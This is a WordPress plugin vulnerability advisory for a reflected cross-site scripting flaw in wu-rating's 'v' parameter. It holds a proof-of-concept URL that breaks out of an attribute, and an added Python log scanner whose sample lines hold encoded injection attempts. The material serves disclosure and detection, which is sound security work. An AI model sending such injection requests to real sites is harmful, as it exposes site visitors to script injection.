wp-plugin : wu-rating – A3-Cross-Site Scripting (XSS)
Plugin Details
Plugin Name : wu-rating
Affected Version : 1.0 12319 (and most probably lower versions, if any)
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/wu-rating/wu-ratepost.php?id=id&v=v”>
Vulnerable Parameter : v
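A detection sketch for the request shown above, added here as an example and not part of the original advisory or the plugin's code: it scans web-server access logs for requests to wu-ratepost.php whose `v` value (and, going slightly beyond the advisory, `id`) contains HTML metacharacters after URL decoding. The combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path and parameter names come from the advisory.
TARGET = "/wp-content/plugins/wu-rating/wu-ratepost.php"
PARAMS = ("id", "v")
# Characters that can close an HTML attribute or open a tag.
META = re.compile(r"""[<>"'`]""")
# Assumption: Apache/nginx "combined" access-log format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Jan/2014:10:00:01 +0000] "GET /wp-content/plugins/wu-rating/wu-ratepost.php?id=12&v=4 HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [17/Jan/2014:10:00:05 +0000] "GET /wp-content/plugins/wu-rating/wu-ratepost.php?id=id&v=v%22%3E HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [17/Jan/2014:10:00:09 +0000] "GET /blog/wp-content/plugins/wu-rating/wu-ratepost.php?id=7&v=3%2522%253E HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [17/Jan/2014:10:00:12 +0000] "GET /index.php?v=%22%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so double-encoded values are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return the wu-ratepost.php parameters whose value holds HTML metacharacters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not unquote(url.path).lower().endswith(TARGET):
        return []
    query = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    return [name for name in PARAMS
            if any(META.search(fully_decode(v)) for v in query.get(name, []))]

def scan(lines):
    """Return (line number, flagged parameters) for every suspicious request."""
    hits = [(n, suspicious_params(line)) for n, line in enumerate(lines, start=1)]
    return [(n, flagged) for n, flagged in hits if flagged]

if __name__ == "__main__":
    for number, flagged in scan(SAMPLE_LOG):
        print(f"line {number}: HTML metacharacters in {', '.join(flagged)}")
```

Because the script is reachable without authentication, hits in historical logs are worth reviewing even on sites where the plugin has since been removed.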
Disclosure Timeline
Vendor Contacted : 2014-01-17
Plugin Description :
Wu-Rating can add a chosen in a post to rate the post,